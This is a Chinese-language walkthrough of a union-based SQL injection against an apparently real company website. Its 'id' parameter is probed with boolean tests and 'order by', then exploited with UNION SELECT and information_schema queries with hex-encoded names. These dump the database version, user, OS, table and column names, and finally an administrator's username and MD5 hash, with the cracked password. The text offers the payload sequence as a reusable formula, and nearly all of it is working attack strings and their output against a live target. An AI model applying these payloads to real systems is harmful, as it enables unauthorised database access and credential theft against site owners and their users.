http://www.XXXXX.com.cn/company_detail.php?id=16
and 1=1 看一下 正常
and 1=2 错误
order by 8 正常
order by 9 错误 说明就是8
UNION SELECT 1,2,3,4,5,6,7,8 8个 出现数字 2 与 6
version()获取版本
database()获取数据库名
user()获取当前用户
@@version_compile_os 获取操作系统信息
先获取版本信息
http://www.XXXXX.com.cn/company_detail.php?id=16 UNION SELECT 1,2,3,4,5,version(),7,8
就是(注入点 UNION SELECT version())注意version()是插在显位数字那里的。
5.1.33-community 大于5.0 可以用这种方法注入
UNION SELECT 1,2,3,4,5,database(),7,8
UNION SELECT 1,2,3,4,5,user(),7,8
UNION SELECT 1,2,3,4,5,@@version_compile_os,7,8
最终得到
version() 5.1.33-community
database() sq_*****
user() *****@localhost
@@version_compile_os Win32
【然后下面就是重点了,这个东西是死的,大家只要记住就可以。我留个公式下来:】
-------------------------------------------嘿嘿,在吗----------------------------------------------------
获取表名:
注入点 UNION SELECT 1,table_name from information_schema.tables where table_schema=编码后(数据库名)
获取表段和字段:
注入点 UNION SELECT 1,column_name from information_schema.columns where table_name=编码后(表名)
获取指定表下的指定字段信息
注入点 UNION SELECT 1,字段名 from 表名
注意数字 1,2,3,4,5,6,7,8 这里给的是1,2 是不对的
-------------------------------------------在啊,有事吗----------------------------------------------------
首先来获取表名:
注入点 UNION SELECT 1,table_name from information_schema.tables where table_schema=编码后(数据库名)
hex编码
http://www.107000.com/T-Hex/ 将得到的结果前面加上 0x
我这里是 0x73715f****6a7873 则为
UNION SELECT 1,2,3,4,5,table_name,7,8 from information_schema.tables where table_schema=0x73715f****6a7873
看上面的语句会发现information_schema.tables 为什么要写这串英文呢?因为版本大于5.0的话有个自带的表,就是它 所有如果小于5.0就么有这张表 注入语句也不会这么写。
得到 ***config 没有全部爆出来
(如果没有全部爆出来,我们只需要把table_name用英文括号括起来,前面加个group_concat 再次访问,就可以获取到所有表)
UNION SELECT 1,2,3,4,5,group_concat(table_name),7,8 from information_schema.tables where table_schema=0x73715f****6a7873
得到 全部表 包括 manager 一看就知道是这个
编码 manager 得0x6d616e6167657220
UNION SELECT 1,2,3,4,5,group_concat(column_name),7,8 from information_schema.columns where table_name=0x6d616e6167657220
结果不是 因为 用这个返回正常的页面
得到 MName MPsw
此时的语句就简单多了:
获取指定表下的指定字段信息
注入点 UNION SELECT 1,2,3,4,5,字段名,7,8 from 表名
即 UNION SELECT 1,2,3,4,5,concat(0x3a,MName,0x3a,MPsw),7,8 from manager
得到 :xyc:99D75B460B05C7D660D7069A0A4D4B4B
即用户名xyc 密码的密文为99D75B460B05C7D660D7069A0A4D4B4B MD5解密得 7238809